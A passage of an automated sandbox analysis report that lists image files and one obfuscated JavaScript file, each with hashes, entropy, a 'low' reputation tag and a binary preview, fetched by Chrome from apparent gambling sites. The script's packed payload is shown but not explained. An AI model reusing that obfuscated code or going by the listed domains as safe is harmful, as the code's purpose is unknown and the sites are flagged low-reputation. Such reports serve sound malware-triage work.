                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......IDATx...u.%.y....)........F.-...Qf.8.l8..7.M6.d...c;..I.E#..0.4..K......3...w.....}j>..uOU=....=......6....^........|7F.S.........1...)....O....&5...<..M.z...W..y.m...!H....f.?., 1 b.c8z.3V.4V.Q..O#f...-._......@. *TN..3z.N...cw`....5..~...U/m.`@'...V.......O..I....!~.....b..7.+_.@c..T..%....X.....W...k..Uo.W.$ Z...b.t.D",..... .....Q-.r."[.K....:A....4AW....D.g...:.?5.3.^t....l.m).../..z.u.{>...X.gN..=.........3.l}...}..d?...,.....4.....a9../,.w.....n.D....A$@;........$....c.>...#.[.Y.......R...X.(...$..[.......D.N...ZR.,l....C.Z..`%.'Vv6..0.8>..ZR.......>.^ ..o.>I..|..\..._........B..l..3A]....!1.....L4.h.$b.A..&.E...Jp..{}.k...u....J..,A...X<....R.4.....`z.6 ..E..p.U......._..o.....|.6".)..:..U..ny.....PX/.|......E.A..j.r.A[`[...n].\x'.~pF....Z.........G......m....T.%.d..+.~...e......eQ......R.{........*.L......E......b.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2153
                                                                                                                                                          Entropy (8bit):7.350943969357906
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:u1hiyWwylZ82lYSqMHi4OyV7zT3XyJ3VyAvGbDEztGpW7gsC+lUQIl4jUM1+S3hu:0uinNuiY5eJ3fWD97+SdlGwwFLDe
                                                                                                                                                          MD5:168AAAAE57F32099066336ACA1A5A4D1
                                                                                                                                                          SHA1:56D836A065E0FF03F655BDAAB9D7FC66217648B5
                                                                                                                                                          SHA-256:DC31AA1C5B25425C763EEBC5B2B6917DE930A61A21EB9065A943679DE092F5E7
                                                                                                                                                          SHA-512:0E531989024A91FA559C84A7911D0ED1F1C1B7C335938A238AD36D3362389AD587EB7902BA2A100D0B24E043A712A5ED328DCE5A72F599600A3E0B3FF817F741
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/live_bbin_w.png
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpRights:Marked="False" xmpMM:OriginalDocumentID="uuid:17BBB51BCE49E711A809823CCFAF5CCB" xmpMM:DocumentID="xmp.did:E7858501F77411E78A94DA59F900EF65" xmpMM:InstanceID="xmp.iid:E7858500F77411E78A94DA59F900EF65" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:66D1DD4E49E111E79B7D9577B3604CC5" stRef:documentID="xmp.did:66D1DD4F49E111E79B7D9577B3604CC5"/> </rdf:Description> </rdf:RDF> </x:xmpme
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (3496), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3496
                                                                                                                                                          Entropy (8bit):5.916580014587443
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:Vv875iNo6UgfgySU6ab8YjpBzFdhByBtdlQpDeB8yMkb:Vv872ojgfgFU6C8YjpBzFdktGahMkb
                                                                                                                                                          MD5:D052EC5C620206804FDD83CB1466A124
                                                                                                                                                          SHA1:78F7608265C6D6272367B2DADC86ECBD2E7CAFF4
                                                                                                                                                          SHA-256:AC72AA09B88727297882B4715F68598BB6798E68D0AD3BE1FCE439ED6576D5A4
                                                                                                                                                          SHA-512:FF66B38258996AE941A1068E53494FB3616A7C8ECE5B7DEBC168A5EB0E783749209C25E463505101F312972D97C727772292E1622742142C742B1748DE69FE7F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/msgBox.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHAZgBYBdAGgG8AiQgagBEBPSgLgDMBXNGAFwEt1M3UiFJIAlFXZIQAAiTcATrx6UA3AHkwAKxA8AdABMQrXmhAAFBSgggF3BphGUA+s5BIAsigPsANiEoKADcoX3YQZgBCAAYAXzFVEIUZNABeJExKCAAxAE0Ac0oxUih0vTRMNGLedMy6A1xgItIUMoreYt9aygA5XIAPdWaYbrp2AHoAJmaFbuiYCFZmg1TMFEwxTHJY0k0dHkxfPQBbKAgPdm4oPnRxLeluDyR85hg9AHF4imgFaQBhOg9czXAAWbE4PH4FW4EgUIG47AUaBkCkMxigfm4egAqnwjj9/oDgdwQYIxDsDCg/r4UNJwVwbhUJCTeEg9A8nvktsdngBlEEoYBRACMpDQKAASiBjqYDMwWWzxVKZWgDKQefkAELeBjMNB+XxfBXlSXS2WpSLCnZXMD+ACCvl4+TQAAkoKr/Ap6ZCBBIACSZPQkkAAWhg6G4IDQ3CKehMqsyNv8se4KDtCgUUAcYjjKAUAFFYKSOAyoWTyEkZCBUgGYaJUiA9NdFJlQk60EVVJQYFHIwpKKl0gB+RswJAZSinBT5UyBSjRGQY1NFZiUfysGODpAjvRjidTmdoENKfIgmOkShLlArygns8D9IAMkfo/HmQPphD6/Pl8u1/J5KkLa7pwHaAAqUAvCWPrQrC8KIsiWJwhAviwCAmDjAAPFAMjjPkpAAOTYTIVzTvCqQuMBaBwJQMgEeSXzrJs2y7NoujcIcJxnO88J9nc2CTnyApNBeGpgbw3DJqJzzagYTDSfkdDXAECnUlA45zkgwkADLGNwPQgMASDaayP4QNY7A5KhhTEMU5D5PCnKybq0GMhsFZQMk3CpMaGrOaovCsJkKBsSog5QBsgggqyJwyTqYjPr5cVyXo/hoPkJIAHzRM+gg+dFbJ+Tq2BJVqOrZNZxC7hGvbFMafpmP
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):140
                                                                                                                                                          Entropy (8bit):5.3256535880866425
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPl3xWrA4RthwkBDsTBZtLdlUmuL1//K0/jp:6v/lhPKM4nDspLfUP5jp
                                                                                                                                                          MD5:1841443641AF694C6515E15166B04B68
                                                                                                                                                          SHA1:58AD8383DDB30D9E9C27A563712B3F0747920384
                                                                                                                                                          SHA-256:B8F06A19EF29E66C792C9C2828A5A49206B70759B20492C1B827300DE8228B1C
                                                                                                                                                          SHA-512:C2CA036FD9C9DEED8255D516A6007BF68BB7A1C04BE59A2B7162DC343117A1B1773A593F81BA012F828A7381735B5AC4F4EF0583D449C4BDBE9B079FEE2D165C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://43370d.top/favicon.ico
                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...1......i..3..$`...................0.@..=..gI....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 334 x 81
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):54005
                                                                                                                                                          Entropy (8bit):7.9268308323455505
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:BW5k9zJQs7ST42qr3RefF2JfF2JfF2JfF2Jfw:fJZSM2w3oEJEJEJEJ4
                                                                                                                                                          MD5:029F0588D3E01F646F6C79DD0CE09BD8
                                                                                                                                                          SHA1:FFD6B7A621A8FB426560F70C88EFDBBE5DFFED3B
                                                                                                                                                          SHA-256:3B448593B8E3DD71F01E8FB59B41D4F267389082B47B9FB381743BC4CAA5DF20
                                                                                                                                                          SHA-512:3D3776FF66E29B10820681D3FA991EA07AE270FB0192694E502CA6CDD18DC17C56783D25EFEE582DD8F0FB6EEED00AA8574C2A89B03D82DDF931227773FF239B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:GIF89aN.Q....U........nQ&...N......$....Q. ....I..[bKA..1....,j....w.....N....g..f..r....yK2.......+....G. +W..........,qi..d.....Q.k.VC.4(..../..vb-..............%7...HN-v.....x.....*..M1$...|c..b&..c...E2...g(.y...{qJ..P.qh.....3.....k3sZ............nZ8...D...............y.Y....g..)..{.v..{>....B...]..7.&9ZF.jS. ...|.......G".....'..w....x..=..q...m..q......dE.....^....s9qxoI..x...X]....G..J`J...T..i..Qk..t..^....d.f#..] ....A.....T..v...HPL..k...9- .....*..Z..dQ.~r(...r[.....p.%.!O:.%.........qj...$......Y.}.......G:......Q1...;.{%9hyE\c~_...I...A..D................f.......e..D..n.......Q...U......k.mP...%..7.BU....U..-....D.....S..a-.....M'......^477..%.@tN.x[+o_X............q.QM. a.8.......i?.p/w`G. ...u......d...........8.....!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 32 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1243
                                                                                                                                                          Entropy (8bit):7.808044353377195
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:h97HQYN3c7kjn0W+vp7o0Ex7I7aYad0Uas8977o:XM0xjn0W+RyFI7a/KhVo
                                                                                                                                                          MD5:CE9F1A2CCC525914C5574C6C0007C374
                                                                                                                                                          SHA1:A81780B59C5FFB4ABF7B5536918548DB5BCB67C3
                                                                                                                                                          SHA-256:1171FC65767CE6A0E3C5769D387169F7F33866017CD0D3DA690D2F10C68EEC49
                                                                                                                                                          SHA-512:7BB125BC59141DA7D8DFD67FE23AC8FAE5A81AB43C7763E5F358C7E3278E9A63511AFBDDC97F8CA2762A0336F64C1E4C5E1B0985FE02D6D3291C40B6D64474C5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR... ..........S.4....IDATHK..[l.u.....- R .....VEb.......l.F.!1;-....D.J..1!*4.....S...}Q....;U.F.@n......Xj.-;.cf/e.Z.k.q.....;.]B.....6~|....t.3.20....8$...m..t6.4.`._<Z..JaZ..2....c........s.........]..1_bB...`...l"...at..W.Z5p+.....+Z.......%.FDq.F.K....qM-S..0.:.....}...W.2...s.G\...$..X..]B.............P.....@.3OC.n....(.......|(.....d5.T./.[...?.~.|...B.....#.dQ...Dk......\.@.q.."..2...j.ttR..M.Z .....K.r.Y.v....-"..a.z....S......$Hl.C.M..~gX....S....p....>u..IE.....4...W.C..:....S"z..}.6...lz8.........`t".S.\~o... .GZ75.......u.ve..3q...A.{.M....sr..;.hr.*o...h.?..aW...V...L...9r>r.....~'f..-...r.y..}w..;4........5uu^...<......o.Q.H....w..W....,[I(Y...@..,Q.U....p.v.F}y..c....._.......^.r3.=H...z.3.:3...U..(K..D.n8`K.XJ...5$.m.{7y..ci..J.iF+$..B........Q._.Vh. ......>._Q.3;`.6......au....|.,.H.`F..#.Hk.x..%..1...n.B.,...m.....!.>O...V..U..-....[JY.B.(...(..3W.hE*@L.......1b.........r.!.f6...g.&...:..[T|..I..8..M._3.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:GIF image data, version 89a, 1000 x 120
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):162150
                                                                                                                                                          Entropy (8bit):7.921497308886431
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:8BSXZ6AGRnx7WHr3R2AKNrXzydEM2QQYpokBSdkXaluHVjlDqD2nL+x8zI7MRG:1XZ6AiJ83FQ25OkBWGaMHl1o8zI7IG
                                                                                                                                                          MD5:13BFC39873789A14049D0969B432E57F
                                                                                                                                                          SHA1:3AD862F601764F3FD5950657B7305EF15537F56C
                                                                                                                                                          SHA-256:3902DF8B824EA5F1934542EA0D0D0E1FCC1DEAADCA3C4F9496A8BF10292EB25D
                                                                                                                                                          SHA-512:9A18568B3C499C566F0A83377323083FAD1779B81AC4FF7C4BEB359CBAD2CB0B259B22AB957AB649EDF6EE2326A97AAB58E9B36D207A6B2832645268503E05E7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:GIF89a..x........k0....*'....R+.R..'..S........+...#.p......f......Ow..g...J..60......J,.G'..M..l..v.k1.Q).....x..L.k.......%..tG.0../.o.,H.+.iK.....uW...........I....s'...vJ".tG....g..f..-.G...S..V....j0.....0&..5....m.s).....FnjQ.I.....f..&.J.........l...........E./J.g.CG...E..lH.$.....y.....V...d...q.JE.xz..u..x......5...5.Y5....u.$.....WA.d....6........>..O.D.....W.....#.B.X...%..........P..#.6...S&...f...Y..au...3..X<......2;.PCL..t7.....Z.6...F.......N...........G.V.....t..w.Y..!..hy....6....].ya.s......W.....y....U......x...h.....Qty........z^..^....#......J.....F.1yX....#.....=..h....6..e....CX5......&X....:6.......__F..e..CH9..-...Ju.&eY..Q."...8.S....^[F........r .....................................!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164488, 2020/07/10-22:06:53 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):98
                                                                                                                                                          Entropy (8bit):4.580480016229387
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:yionv//thPlE+kSI+DthC9/kITQoWlED//jp:6v/lhPfkCDtETT9WlEDTp
                                                                                                                                                          MD5:73DF4484683667DA60643329AF7DBDD9
                                                                                                                                                          SHA1:9AE16E29D964C6A1ADE80D1A98FDAC225C8DC291
                                                                                                                                                          SHA-256:D5C956BFFB7565A9DF0E1B3C80AFBA091A617944474243FE8C90D606D75090EC
                                                                                                                                                          SHA-512:29C8C67E0412D06164C72BF9B15B0C24FA5EC1015F11EC57653AA7B28561FC5FCE7384302A8C7978D1C9E3AA88939AF3C64FC68AF38844AC4DC3E72D7E6C76C1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/cc.png?r=5294706042
                                                                                                                                                          Preview:.PNG........IHDR.............%.V.....gAMA......a.....PLTE...........IDAT..c`.......!.3....IEND.B`.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2009
                                                                                                                                                          Entropy (8bit):6.617757417786492
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:x/6/zNnwknA9Wp8qeJscJ3n3eyHFVQap3Wy2gXCZJ:xSBwknmWp8kUHFVj3Wy2g2
                                                                                                                                                          MD5:3AB9C471DDC68A6A6D13CA8D04D15B42
                                                                                                                                                          SHA1:4DD57AFF9FA84FDFC5EED735B61DCBE0115EFD3C
                                                                                                                                                          SHA-256:BB92B724EEC41E39F0ECAD0BA9DD41FA1BD1294A67918EC5ECD80FAA5E25DF02
                                                                                                                                                          SHA-512:6288B33D6851AAF6BB06287B42932A53BEA34475F30465D1B364655B58D9321FBBBC1E877B87BE36DF30B2938BD86BE359675DE764C40CC6061B5F5484EAACBE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/slot/10044.png
                                                                                                                                                          Preview:.PNG........IHDR..............w=.....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmp:CreateDate="2023-07-19T12:07:20+08:00" xmp:ModifyDate="2023-07-24T11:26:32+08:00" xmp:MetadataDate="2023-07-24T11:26:32+08:00" xmpMM:InstanceID="xmp.iid:86eddd11-50b6-4276-93fe-3fd48dead353" xmpMM:DocumentID="xmp.did:E484106DF3A011E7B7B8ED81F9295C83" xmpMM:OriginalDocumentID="xmp.did:E484
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1632
                                                                                                                                                          Entropy (8bit):7.8260874164248
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:Io01NVWRzVAKDblf8NgnVv7FsWS97WoX/:Io2fWRN1f8IVv7boX/
                                                                                                                                                          MD5:D1BA4C76AA54D1B75EFDC2F29280A579
                                                                                                                                                          SHA1:6CF97198A6AFCB69C6C47EE64A3F1C653A71BBB0
                                                                                                                                                          SHA-256:085CDBE30A3B6EB6C37161F0BDA0CFED19A57648A50832185920046DDA686271
                                                                                                                                                          SHA-512:98A201441FBCEBAACECE328F6FE526EF8988B05CA6E017E0ACE884DC648C335B07735E13A5AE80C4F6D568858957079BE9131AAB2C93F654C1B750E3D89ACC26
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/fish_tp-11.png
                                                                                                                                                          Preview:.PNG........IHDR...............^.....PLTE...WZcp:/]k}.X7QON..K..z.....~aF\EA..".._.]s.E...uZ=H79.......W6..)w..nB.hLC$D.V+..a.j<.uk....9[FC>'#../..#.*.g.[>NV...i.j7*.......s..Yz.....y"b..zO6p....n.,k.W.?Sv.Fl.4b.(QFEN.h8.M,.?..{..D..w.9q[fnD.\.uV7<P._1.S!...._.N)..d....2..=....r..'a..s..ho.d`;Z.CP.cO~XC[:@.!7.g2.q0.z*.)...............x........e....v...x..p..`....Rv..R.....^.b,.Lt.o(..M..k.nk..i.`DRY.Q.G..E..C13>fO:.0"m0...f#+..%e;..H.....}..h.5..+..y.%...._..g...o.(.x.....K....MU.]..g..&d....Q..q...j.r@..l.9a.......y~..}.Ywg:v.nl}.j..i.G^.]z.Z&7ZxoY.bRB.OfeO.jJ..II.E..C.?6G&2.,/..).~)..'.f&A;#...f.....I........'.U.....|..]....l..&.....@h..&...uu.............n...W..A.........1..L=.....my0.q.mW.lN.k..`.SZ]/NM%N.JX.F.9F..B..<[p-.*.o...........:.....8tRNS.../.@.....1......N............znlSN ..............{\Z.......IDAT(.b .02200.2(cH.00....r32.Jp..I*.J.pppx,...Z.&-...k......g....Ql.d.O.*,.s.,...U7F..rq.n....~..9p.....R.ff.l-.K.......MI
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 50 x 36, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4592
                                                                                                                                                          Entropy (8bit):7.858171152982243
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:uYR25AjLna4MK04BGrfs7hG9nYuLyHQOCxbM9Qml4lc:/FXa4MKvkrghG9Yk8Ct0Wc
                                                                                                                                                          MD5:51FDF17068E84A28557E6E3A2B5E2DBB
                                                                                                                                                          SHA1:13E1E46E5C4A197AA3E0D28E60291D94519B8388
                                                                                                                                                          SHA-256:0FEE5018735220F2F1E5FE7871304A114DE261E21802F50B6598F63081822805
                                                                                                                                                          SHA-512:3AF1BB9FE30F98D0F69C897075A1D3F4E8ABB2ACF66A858D8B147E56E5F98AFD79B06A5D3F61199784CB9A704FEDB3D353AFD99952978BF6E15F314127FF0B14
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-s/live_allbet.png
                                                                                                                                                          Preview:.PNG........IHDR...2...$......i7....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2019 (Windows)" xmpMM:InstanceID="xmp.iid:E2B0A30B4EB611E9B6AF98114C107AF1" xmpMM:DocumentID="xmp.did:E2B0A30C4EB611E9B6AF98114C107AF1"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E2B0A3094EB611E9B6AF98114C107AF1" stRef:documentID="xmp.did:E2B0A30A4EB611E9B6AF98114C107AF1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......`IDATx..XytS..=.i.%K.e.W.6....c0..`6......H&.!L.0..dJI...4i.Rj.4..Y..3.,....[..ly.%k..'i..?fJs.s.?..{.;..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2779
                                                                                                                                                          Entropy (8bit):7.67987959759948
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VVsCvnujFJ3D71iwQ2T595pkqYfMY5BDxZYzPlxbJ7YcGrAPB+XB7:J2P71ir2T59OECBdZMx+drAPB27
                                                                                                                                                          MD5:28096D9486586F6F0F6A37DE4E639F72
                                                                                                                                                          SHA1:B041532873DF1BEFFEBCB97EC595E6973E890F09
                                                                                                                                                          SHA-256:0F3393C176B54A707E02142A1AC06BFB1B33BBB570EE4A0FF781C4CE32154D14
                                                                                                                                                          SHA-512:37F6D8BDDD9F0065080FEDD5B563D94BD31697D1BFE529FB93FCCCB11407A01CCCFE3EE72373DA59875120281F98CC7FF8CE932113ED770B2D63115C894CE15B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A5717EED24D511EC9C59D68007445A1A" xmpMM:InstanceID="xmp.iid:A5717EEC24D511EC9C59D68007445A1A" xmp:CreatorTool="Adobe Photoshop 22.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:B3319408201511EC99A1C7F1AEAD39D0" stRef:documentID="xmp.did:B3319409201511EC99A1C7F1AEAD39D0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......MIDATx..Wkl.W.=w...c...q[w.4nP....R.hJQU....RS....@T......*...B...R..xH.6...^I[Z..:..{..i......yr....?.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2647
                                                                                                                                                          Entropy (8bit):7.651439905008171
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VLCNn2OlMS6J3I54X1qGwZVA9FpIxC84W1GZlSETm/tc2FCWp0cEap61NfuzM:g2UMSn54FqLA9G1GZ0ymbNp0cEqcZiM
                                                                                                                                                          MD5:6AACE756945D9822BB232862BFA9DD2A
                                                                                                                                                          SHA1:C17DDFEB7F07CE8D505B1B91912858605BFECC2B
                                                                                                                                                          SHA-256:145785DDB4FB759895CE6E23ECDF6BF317ED9BD637F076F01BD4870A9D9D82AA
                                                                                                                                                          SHA-512:4877B753716EE79E67E0C09B78A3FECBC49AF125D8FCDE0A73F35DA181D0A3625D47048D2DE8D6941AD3AA059BCADBA4C37B380D9A937F7F1AF82C48A7975D02
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.............;0......tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.0-c000 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 22.5 (Windows)" xmpMM:InstanceID="xmp.iid:A5199274064511EC9C03A0A58B27D196" xmpMM:DocumentID="xmp.did:A5199275064511EC9C03A0A58B27D196"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A5199272064511EC9C03A0A58B27D196" stRef:documentID="xmp.did:A5199273064511EC9C03A0A58B27D196"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...$....IDATx..V[h\..].f.j..<c=<.l+q]).*.G5-...Ph.....*!.R7.i..@(-.*%..%}.R...4..Mb....e.%.3.fF3..~..{&.-....g
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):38521
                                                                                                                                                          Entropy (8bit):7.98728190285807
